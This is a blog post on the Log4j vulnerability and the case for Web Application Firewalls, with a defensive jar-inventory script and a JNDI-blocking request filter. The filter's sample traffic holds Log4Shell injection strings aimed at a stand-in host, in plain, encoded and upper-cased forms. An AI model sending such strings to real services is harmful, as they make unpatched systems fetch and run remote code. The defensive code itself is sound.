When the head of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) calls a software vulnerability among the most serious she has seen in her career, “if not the most serious,” you know that it’s pretty bad. These were the words of CISA director Jen Easterly, describing the expanding Log4j crisis, a vulnerability she says could take years to fully address.
The vulnerability in question affects a popular open-source, widely used library for internet services and software applications. The Log4j vulnerability, which requires little in the way of expertise on the part of those who exploit it, could be used to exfiltrate data, infect networks with malware, steal passwords and login information, and much more – conceivably from millions of computers.
Its potentially wide-ranging use cases are a reminder of just why security measures such as Web Application Firewalls (WAF) are so essential.
The significance of the Log4j vulnerability
The Log4j vulnerability is representative of a trend in modern software creation whereby software is often written by patching together building blocks of code, instead of writing it from the ground-up. This is frequently done for time efficiency and cost-savings, as well as to optimize performance by using the best bits of code available. Log4j is one such building block.
It’s a logging tool that assists developers by helping them to track the activity that takes place in systems or applications. In doing so, it can aid them in hunting down and fixing problems. Virtually every piece of software involves some kind of logging functionality – whether that’s for future development, security purposes, or day-to-day operations – and Log4j is a common library for doing this logging. As Jen Easterly pointed out, a major vulnerability is therefore incredibly bad news. (And, given that Log4j helps developers look out for trouble, more than a little ironic in the worst possible way.)
For individual users and organizations alike, Log4j is almost certainly part of the tools you rely on every day. The best advice for safeguarding against this vulnerability is to keep applications regularly updated, since updates are how developers deliver the code that protects against it.
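Keeping applications updated starts with knowing where the library is. The following script, added here as an illustration and not taken from the post or from the Log4j project, walks a directory tree, opens every log4j-core jar it finds, reads the Implementation-Version from the jar manifest and reports any copy that is older than a minimum version you supply (or whose version cannot be read at all). The minimum version is deliberately a parameter: take it from the Log4j project's advisory for the issue you are tracking rather than from this example. The sample tree it builds, including the version strings 2.10.0, 2.99.0 and the threshold 2.50.0, is constructed for the demo.

```python
"""Inventory check for log4j-core jars on disk (added example, not from the post).

Finds log4j-core*.jar files under a root directory, reads Implementation-Version
from META-INF/MANIFEST.MF, and returns the jars whose version is below the
operator-supplied minimum or whose version cannot be determined.
"""
import os
import re
import tempfile
import zipfile


def parse_version(text):
    """'2.10.0' -> (2, 10, 0); unparsable input sorts below everything."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts) or (0,)


def manifest_version(jar_path):
    """Return the Implementation-Version from a jar manifest, or None."""
    with zipfile.ZipFile(jar_path) as zf:
        try:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def find_log4j_jars(root):
    """Yield paths of every log4j-core*.jar below root."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                yield os.path.join(dirpath, name)


def outdated_jars(root, minimum_ok):
    """Return [(path, version_or_None)] for jars below minimum_ok or unreadable."""
    floor = parse_version(minimum_ok)
    findings = []
    for jar in find_log4j_jars(root):
        version = manifest_version(jar)
        if version is None or parse_version(version) < floor:
            findings.append((jar, version))
    return findings


def build_sample_tree(root):
    """Create a constructed tree with three fake log4j-core jars (not real builds)."""
    samples = {
        "app1/lib/log4j-core-2.10.0.jar": "Implementation-Version: 2.10.0\n",
        "app2/lib/log4j-core-2.99.0.jar": "Implementation-Version: 2.99.0\n",
        "app3/lib/log4j-core.jar": "Implementation-Title: log4j-core\n",  # no version
    }
    for rel, manifest_body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n" + manifest_body)


def demo(minimum_ok="2.50.0"):
    """Build the sample tree in a temp dir and return findings relative to it.
    The threshold 2.50.0 is a placeholder, not a real advisory value."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return sorted(
            (os.path.relpath(jar, root), version)
            for jar, version in outdated_jars(root, minimum_ok)
        )


if __name__ == "__main__":
    for path, version in demo():
        print(f"{path}: version {version or 'unknown'} needs attention")
```

Run it against a real root with `outdated_jars("/opt", "<version from the advisory>")`. Jars embedded inside other archives (war, ear, fat jars) are not opened by this version; a production inventory tool has to recurse into those as well.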
The FTC steps in
In most cases, diligent developers are quick to patch vulnerabilities when they’re made aware of them. In the case of Log4j, however, there’s an added incentive: They could face legal action from the Federal Trade Commission (FTC) if they don’t adequately protect consumers.
In January, the FTC said that the Log4j vulnerability represented a “severe threat” to web applications, enterprise software solutions, and consumer products – and is being taken advantage of by an increasing number of bad actors. The FTC stated that, to avoid penalties, organizations must “act now” to protect their customers.
This legal warning will most likely prompt developers to introduce measures against the Log4j vulnerability more rapidly. However, that alone will not solve the problem. To be adequately protected, users have to download and install the necessary patches. This is time-consuming work, difficult for organizations that rely on large numbers of software packages, and taking systems offline to install updates may not be straightforward.
Use the right tools to protect yourself
What users need is a better way to manage their protection against software vulnerabilities, from major ones like Log4j to the more minor, less publicized ones. Luckily, the right cybersecurity tools are there to help. Web Application Firewalls and associated solutions (such as WAAP, Web Application & API Protection) can monitor, filter and block HTTP traffic both arriving at and leaving web services.
They also support virtual patching: a set of rules that block malicious requests at the edge without a patch having been installed on the application itself. In doing so, these solutions can help protect active and legacy applications, third-party tools, APIs and microservices, cloud applications, and much more, while avoiding the false positives that can plague such protective solutions.
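To make virtual patching concrete, here is a small request filter in the spirit of such a rule. It is an added example written for this post, not a WAF vendor's rule set and not code from the Log4j project: it inspects the request path and headers (the parts of a request that commonly end up in application logs), normalizes each value, and rejects the request if it carries a JNDI lookup string, so an unpatched application behind the filter never sees it. The normalization step is the point a practitioner should take away: a rule that only looks for the literal text is defeated by percent-encoding or a change of case, so the rule decodes, lower-cases and collapses nested `${...:x}` lookup wrappers before matching. The requests below, including the host `example.invalid`, are constructed for the demo.

```python
"""Virtual-patch style HTTP request filter (added example, not a vendor's rules).

inspect_request() returns (allowed, reason). Values are normalized before
matching so that encoding or case changes do not slip past the rule.
"""
import re
from urllib.parse import unquote

# A lookup wrapper such as ${lower:x} is collapsed to x. The jndi prefix is
# excluded so the thing we are looking for is never collapsed away.
NESTED_LOOKUP = re.compile(r"\$\{(?!jndi:)[a-z]+:([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:")


def normalize(value):
    """Percent-decode twice (double encoding), lower-case, then collapse
    nested lookup wrappers until the string stops changing."""
    text = unquote(unquote(value)).lower()
    while True:
        collapsed = NESTED_LOOKUP.sub(r"\1", text)
        if collapsed == text:
            return text
        text = collapsed


def inspect_request(request):
    """request: {'path': str, 'headers': {name: value}}.
    Returns (True, 'clean') or (False, 'jndi lookup in <field>')."""
    fields = {"path": request.get("path", "")}
    for name, value in request.get("headers", {}).items():
        fields["header:" + name.lower()] = value
    for field, raw in fields.items():
        if JNDI_LOOKUP.search(normalize(raw)):
            return False, "jndi lookup in " + field
    return True, "clean"


# Constructed sample traffic: one benign request and three that a virtual
# patch should stop (plain, percent-encoded, and upper-cased forms).
SAMPLE_REQUESTS = [
    {"path": "/search?q=log4j+upgrade", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/", "headers": {"User-Agent": "${jndi:ldap://example.invalid/a}"}},
    {"path": "/?q=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fa%7D", "headers": {}},
    {"path": "/", "headers": {"X-Api-Version": "${JNDI:dns://example.invalid}"}},
]


def filter_all(requests=SAMPLE_REQUESTS):
    """Apply the rule to every sample request; returns a list of decisions."""
    return [inspect_request(r) for r in requests]


if __name__ == "__main__":
    for request, (allowed, reason) in zip(SAMPLE_REQUESTS, filter_all()):
        verdict = "ALLOW" if allowed else "BLOCK"
        print(f"{verdict:5} {request['path']!r:55} {reason}")
```

The decision and reason should be logged on every block, because that log is how you find out which applications are still receiving these requests and therefore still need the real patch. A rule like this buys time; it does not remove the vulnerable code, so it complements the update process rather than replacing it.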
As the world relies more than ever on web applications and online services in general, such tools are only going to become more critical. Vulnerabilities as serious as Log4j may be rare, but there is no shortage of lesser ones that still threaten to harm users around the world.
Organizations and users alike should follow best practices for keeping software updated. However, they should also use tools like a WAF as a much-needed extra layer of protection. Compared with the cost of a successful cyberattack, investing in these tools is a no-brainer. It should be part of every sustainable vulnerability management strategy.